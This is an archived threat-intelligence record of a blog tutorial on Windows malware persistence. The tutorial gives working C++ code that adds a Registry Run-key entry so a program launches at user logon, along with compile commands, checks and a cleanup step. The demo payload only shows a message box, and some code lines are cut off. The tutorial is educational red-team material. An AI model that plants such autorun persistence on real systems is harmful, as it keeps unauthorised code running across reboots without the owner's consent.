{
	"id": "477085b9-b2cd-4322-9d2d-74e1590741a9",
	"created_at": "2026-04-06T00:13:20.327831Z",
	"updated_at": "2026-04-10T03:20:16.319073Z",
	"deleted_at": null,
	"sha1_hash": "f9b285ccb48d71c153b1a6025cde00f1425c86e9",
	"title": "Malware development: persistence - part 1. Registry run keys. C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3901511,
	"plain_text": "Malware development: persistence - part 1. Registry run keys. C++\r\nexample.\r\nBy cocomelonc\r\nPublished: 2022-04-20 · Archived: 2026-04-05 19:58:02 UTC\r\n2 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post starts a series of articles on windows malware persistence techniques and tricks.\r\nToday I’ll write about the result of my own research into the “classic” persistence trick: startup folder registry\r\nkeys.\r\nrun keysPermalink\r\nAdding an entry to the “run keys” in the registry will cause the app referenced to be executed when a user logs in.\r\nThese apps will be executed under the context of the user and will have the account’s associated permissions level.\r\nThe following run keys are created by default on Windows Systems:\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 1 of 15\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nPlease note that this suggests to another trick to anti-VM (VirtualBox)\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\nThreat actors can use these configuration locations to execute malware to maintain persistence through system\r\nreboots. Threat actors may also use masquerading to make the registry entries look as if they are associated with\r\nlegitimate programs.\r\npractical examplePermalink\r\nLet’s go to look at a practical example. Let’s say we have a “malware” hack.cpp :\r\n/*\r\nmeow-meow messagebox\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 2 of 15\n\n*/\r\n#include \u003cwindows.h\u003e\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBoxA(NULL, \"Meow-meow!\",\"=^..^=\", MB_OK);\r\n return 0;\r\n}\r\nLet’s go to compile it:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -mwindows -I/usr/share/mingw-w64/include/ -s -ffunction-section\r\nAnd save it to folder Z:\\\\2022-04-20-malware-pers-1\\ :\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 3 of 15\n\nThen, let’s create a script pers.cpp that creates registry keys that will execute our program hack.exe when we\r\nlog into Windows:\r\n/*\r\npers.cpp\r\nwindows low level persistense via start folder registry key\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // malicious app\r\n const char* exe = \"Z:\\\\2022-04-20-malware-pers-1\\\\hack.exe\";\r\n // startup\r\n LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0 , KE\r\n if (res == ERROR_SUCCESS) {\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 4 of 15\n\n// create new registry key\r\n RegSetValueEx(hkey, (LPCSTR)\"hack\", 0, REG_SZ, (unsigned char*)exe, strlen(exe));\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nAs you can see, logic is simplest one. We just add new registry key. Registry keys can be added from the terminal\r\nto the run keys to achieve persistence, but since I love to write code, I wanted to show how to do it with some\r\nlines of code.\r\ndemoPermalink\r\nLet’s compile our pers.cpp script:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nThen, first of all, check registry keys in the victim’s machine:\r\nreg query \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /s\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 5 of 15\n\nThen, run our pers.exe script and check again:\r\n.\\pers.exe\r\nreg query \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /s\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 6 of 15\n\nAs you can see, new key added as expected.\r\nSo now, check everything in action. Logout and login again:\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 7 of 15\n\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 8 of 15\n\nPwn! Everything is worked perfectly :)\r\nAfter the end of the experiment, delete the keys:\r\nRemove-ItemProperty -Path \"HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"hack\"\r\nreg query \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /s\r\nwindows 11Permalink\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 9 of 15\n\nThis trick is also work on Windows 11 :\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 10 of 15\n\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 11 of 15\n\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 12 of 15\n\nAnd cleanup:\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 13 of 15\n\nconclusionPermalink\r\nCreating registry keys that will execute an malicious app during Windows logon is one of the oldest tricks in the\r\nred team playbooks. Various threat actors and known tools such as Metasploit, Powershell Empire provide this\r\ncapability therefore a mature blue team specialists will be able to detect this malicious activity.\r\nRegOpenKeyEx\r\nRegSetValueEx\r\nRegCloseKey\r\nRemove-ItemProperty\r\nreg query\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 14 of 15\n\nSource: https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html"
	],
	"report_names": [
		"malware-pers-1.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434400,
	"ts_updated_at": 1775791216,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f9b285ccb48d71c153b1a6025cde00f1425c86e9.pdf",
		"text": "https://archive.orkl.eu/f9b285ccb48d71c153b1a6025cde00f1425c86e9.txt",
		"img": "https://archive.orkl.eu/f9b285ccb48d71c153b1a6025cde00f1425c86e9.jpg"
	}
}